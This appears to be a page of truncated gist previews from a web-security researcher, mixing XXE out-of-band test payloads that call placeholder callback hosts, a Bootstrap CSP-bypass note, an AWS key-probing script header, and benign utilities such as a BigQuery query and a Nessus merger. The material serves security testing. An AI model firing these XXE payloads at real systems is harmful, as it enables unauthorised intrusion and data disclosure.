Bootstrap < 3.4.1 || < 4.3.1
✔️ CSP strict-dynamic bypass
➖ Requires user interaction
➖ Requires $('[data-toggle="tooltip"]').tooltip();
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
#!/bin/bash | |
# Written by Frans Rosén (twitter.com/fransrosen) | |
_debug="$2" #turn on debug | |
_timeout="20" | |
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
_aws_key="AKIA..." | |
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
# https://discuss.httparchive.org/t/how-many-text-files-are-not-served-with-gzip/1092 | |
# | |
# https://bigquery.cloud.google.com/table/httparchive:runs.2017_10_15_requests | |
# | |
# Browse encoding and MIME type for 10 random requests. | |
#standardSQL | |
SELECT | |
resp_content_encoding, | |
mimeType, |
import requests | |
import re | |
import sys | |
from multiprocessing.dummy import Pool | |
def robots(host): | |
r = requests.get( | |
'https://web.archive.org/cdx/search/cdx\ | |
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
<?xml version="1.0" encoding="UTF-8"?> | |
<ThreeDSecure> | |
<Message id="999"> | |
<VEReq> | |
<version>1.0.2</version> | |
<pan>4444333322221111</pan> | |
<Merchant> | |
<acqBIN>411111</acqBIN> | |
<merID>99000001</merID> | |
<password>99000001</password> |
# file: merger.py | |
# based off: http://cmikavac.net/2011/07/09/merging-multiple-nessus-scans-python-script/ | |
# by: mastahyeti | |
import xml.etree.ElementTree as etree | |
import shutil | |
import os | |
first = 1 | |
for fileName in os.listdir("."): |
<!DOCTYPE html> | |
<html> | |
<head> | |
<title>Upload your files</title> | |
</head> | |
<body> | |
<form enctype="multipart/form-data" action="upload.php" method="POST"> | |
<p>Upload your file</p> | |
<input type="file" name="uploaded_file"></input><br /> | |
<input type="submit" value="Upload"></input> |